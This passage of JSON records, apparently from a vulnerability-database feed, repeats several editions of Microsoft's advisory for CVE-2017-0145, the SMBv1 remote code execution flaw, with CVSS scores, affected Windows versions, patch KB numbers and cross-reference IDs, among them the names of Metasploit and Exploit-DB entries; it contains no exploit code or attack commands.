"KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T20:55:04", "differentElements": ["msAffectedSoftware"], "edition": 55}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-17T22:48:26", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB4012212", "KB4012215", "KB3210720", "KB4012598", "KB4012213", "KB4013429", "KB3205401", "KB4012606", "KB3213986", "KB3210721", "KB3205409", "KB4013198", "KB4012214", "KB3177186", "KB4014077", "KB4012216", "KB3212646", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T22:48:26", "differentElements": ["msAffectedSoftware"], "edition": 56}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-18T00:49:58", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB4012212", "KB4012215", "KB3210720", "KB4012598", "KB4012213", "KB4013429", "KB3205401", "KB4012606", "KB3213986", "KB3210721", "KB3205409", "KB4013198", "KB4012214", "KB3177186", "KB4014077", "KB4012216", "KB3212646", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-18T00:49:58", "differentElements": ["msAffectedSoftware"], "edition": 57}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-18T02:48:09", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", 